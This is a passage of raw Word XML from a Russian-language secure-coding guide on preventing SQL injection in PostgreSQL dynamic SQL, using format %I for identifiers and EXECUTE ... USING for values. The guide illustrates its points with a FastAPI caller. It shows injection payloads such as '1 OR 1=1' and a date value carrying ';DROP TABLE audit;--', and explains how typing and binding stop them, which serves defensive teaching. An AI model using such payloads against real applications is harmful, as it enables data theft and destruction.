          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, PostgreSQL интерпретирует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как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">value-position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не identifier-position → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: syntax error at or near "$1"</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то же протокольное ограничение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что и application-side (3.14.2): bind подставляет values, identifier требует текстовой подстановки.</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подраздел про защитный pattern + конкретное ограничение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: показывает, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">что USING правильно использовать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для значений) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">что нельзя</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для имён) — чтобы в 3.16.4 показать антипаттерн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-concat для значений, который вместо USING.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защищённый код (canonical pattern).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Безопасный pattern: identifier через %I, values через USING</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app.find_by_id(tbl_name text, row_id int, since_date date)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS jsonb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result jsonb;</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Identifier через %I (3.16.1), values через USING (3.16.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'SELECT to_jsonb(t) FROM %I AS t WHERE t.id = $1 AND t.created_at &gt;= $2',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        tbl_name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INTO result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING row_id, since_date;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</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Application-caller:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/{table}/{row_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def find_by_id(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table: str,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    row_id: int,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    since: date = Query(...),</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT app.find_by_id(:tbl, :rid, :since)"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"tbl": table, "rid": row_id, "since": since},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result.scalar()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_id</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GET /users/1%20OR%201=1/?since=2024-01-01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_id = "1 OR 1=1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (string). FastAPI cast в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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP 422</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на уровне routing, не доходит до handler. Защита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">в двух местах</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: FastAPI типизация + serverside USING-bind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">since</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GET /users/1/?since=2024-01-01';DROP TABLE audit;--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">since = "2024-01-01';DROP TABLE audit;--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — FastAPI cast в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP 422</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если даже бы прошло через FastAPI, в plpgsql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING $2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> подставит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не SQL-text:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Внутри функции:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT to_jsonb(t) FROM "users" AS t WHERE t.id = $1 AND t.created_at &gt;= $2'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING 1, '2024-01-01;DROP TABLE audit;--'::date;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ $2 — это value, не SQL → ERROR: invalid input syntax for type date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL type-coerce падает с syntax error, но НЕ исполняет injected SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Попытка использовать USING для identifier — НЕ работает</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- АНТИПАТТЕРН: попытка USING для имени таблицы</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app.broken_find(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS SETOF record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EXECUTE 'SELECT * FROM $1' USING tbl_name;  -- ← БУГ</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При вызове:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM app.broken_find('users') AS t(id int);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ERROR: syntax error at or near "$1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- LINE 1: SELECT * FROM $1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--                       ^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL parser не позволяет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в FROM-clause — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">value-placeholder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а FROM ожидает identifier. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">то же ограничение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что в application-Wire-Protocol: bind работает только в expression-position.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Корректный путь — комбинировать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для имени и USING для значений:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
